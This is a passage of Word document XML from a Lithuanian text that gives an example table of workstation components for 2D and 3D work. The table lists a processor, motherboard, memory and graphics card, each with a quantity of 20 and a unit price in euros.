          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>darbo vietų</w:t>
      </w:r>
      <w:r w:rsidR="003F0C14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>skirtų darbui su 2D ir 3D programomis, atsižvelg</w:t>
      </w:r>
      <w:r w:rsidR="003F0C14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>damas</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į visus sisteminius reikalavimus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632B1B6" w14:textId="77777777" w:rsidR="00BA57B0" w:rsidRPr="005A5C28" w:rsidRDefault="00BA57B0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDF083C" w14:textId="10A5DD97" w:rsidR="00873217" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124DAF7A" w14:textId="064C2E1A" w:rsidR="009336D8" w:rsidRPr="005A5C28" w:rsidRDefault="7F588CEA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atsižvelgiant į gamintojo rekomendacijas parinktos tokios kompiuterinių sistemų ir tinklinės įrangos specifikacijos</w:t>
      </w:r>
      <w:r w:rsidR="5EFB91CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Tinklinės įrangos ir kompiuterių komponentų lentelė</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="1DC34744" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2606"/>
        <w:gridCol w:w="4210"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="2111"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0C863C9F" w14:textId="77777777" w:rsidTr="006D4299">
        <w:trPr>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1316" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="18FC6EF2" w14:textId="66834493" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="53E65988" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prekės pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="54AB0BA2" w14:textId="21C03B97" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="53E65988" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prekės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5C9A73F0" w14:textId="1495E088" w:rsidR="40A7FD31" w:rsidRPr="005A5C28" w:rsidRDefault="40A7FD31" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="27E4C793" w14:textId="4FC59D4F" w:rsidR="611C6414" w:rsidRPr="005A5C28" w:rsidRDefault="415CB24F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kaina</w:t>
            </w:r>
            <w:r w:rsidR="164757FA" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="626FA294" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1 vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3CB20BFA"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75DB1CC4" w14:textId="5B5552D6" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="146230D4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procesorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3275B266" w14:textId="510BB3EC" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="330C879C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>AMD Ryzen 5 3600, 6C/12T, 4.2 GHz, 36 MB, AM4, 65W, 7nm, BOX (su aušintuvu dėžutėje)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5DFF298D" w14:textId="7365F248" w:rsidR="00482BD8" w:rsidRPr="005A5C28" w:rsidRDefault="00482BD8" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="460F77BA" w14:textId="1BA190AA" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="23A61524" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>90€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="42DD73E6"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6510F38A" w14:textId="7B82902B" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="09A838C2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Pagrindinė plokštė </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="274DF4DB" w14:textId="2BBBA7FE" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="60DC0D32" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>GIGABYTE B550M DS3H AM4 DDR4 2xM.2 4xSATA DVI-D HDMI mATX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22AE8C8A" w14:textId="0A5089A9" w:rsidR="039CF5F3" w:rsidRPr="005A5C28" w:rsidRDefault="039CF5F3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70928907" w14:textId="0FA8D563" w:rsidR="11670FBF" w:rsidRPr="005A5C28" w:rsidRDefault="11670FBF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>29 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="735E921A"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46EFCDC7" w14:textId="16D99D8C" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="5BD405C3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operatyvinė atmintis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A80BFAB" w14:textId="2BBBA7FE" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="53E65988" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="753B2C91" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>KINGSTON 16GB 3600MHz DDR4 CL17 DIMM Kit of 2 1Rx8 HyperX FURY Black</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C100BA1" w14:textId="1703DB84" w:rsidR="4D1249FD" w:rsidRPr="005A5C28" w:rsidRDefault="4D1249FD" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="233971E8" w14:textId="1ED7707B" w:rsidR="2033964E" w:rsidRPr="005A5C28" w:rsidRDefault="2033964E" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>79 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="608B6371"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02728478" w14:textId="440C903B" w:rsidR="4693D84D" w:rsidRPr="005A5C28" w:rsidRDefault="74CEC5B5" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vaizdo plokštė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C5C0A87" w14:textId="04681982" w:rsidR="2FC471A4" w:rsidRPr="005A5C28" w:rsidRDefault="2FC471A4" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>GIGABYTE Radeon AMD RX 5700 XT GAMING OC 8GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3184979E" w14:textId="3BADD2FE" w:rsidR="2FC471A4" w:rsidRPr="005A5C28" w:rsidRDefault="2FC471A4" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D56FB1C" w14:textId="4ACE6BEA" w:rsidR="2FC471A4" w:rsidRPr="005A5C28" w:rsidRDefault="2FC471A4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>481</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
